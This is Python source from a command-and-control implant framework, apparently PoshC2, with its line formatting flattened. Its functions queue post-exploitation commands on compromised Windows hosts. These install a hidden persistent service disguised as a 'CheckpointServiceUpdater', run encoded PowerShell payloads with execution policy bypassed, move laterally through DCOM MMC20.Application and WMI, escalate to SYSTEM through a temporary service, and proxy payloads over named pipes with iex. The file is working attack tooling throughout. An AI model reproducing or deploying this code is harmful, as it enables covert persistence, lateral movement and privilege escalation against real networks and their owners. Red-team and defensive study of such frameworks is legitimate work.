def do_install_servicelevel_persistence(user, command, randomuri): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[17], C2[18], C2[19], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) new_task(cmd, user, randomuri)
def do_invoke_dcompayload(user, command, randomuri): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[17], C2[18], C2[19], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload) new_task(pscommand, user, randomuri)
def do_invoke_wmipayload(user, command, randomuri): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[17], C2[18], C2[19], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-wmipayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload) new_task(cmd, user, randomuri)
def do_get_system(user, command, randomuri): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri)
def do_install_servicelevel_persistencewithproxy(user, command, randomuri): C2 = get_c2server_all() if C2[11] == "": print_bad("Need to run createproxypayload first") return else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[17], C2[18], C2[19], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) new_task(cmd, user, randomuri)
def do_invoke_runasproxypayload(user, command, randomuri): C2 = get_c2server_all() if C2[11] == "": print_bad("Need to run createproxypayload first") return else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[17], C2[18], C2[19], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload new_task(proxyvar, user, randomuri) check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipeProxy.ps1", randomuri, user) params = re.compile("invoke-runasproxypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri)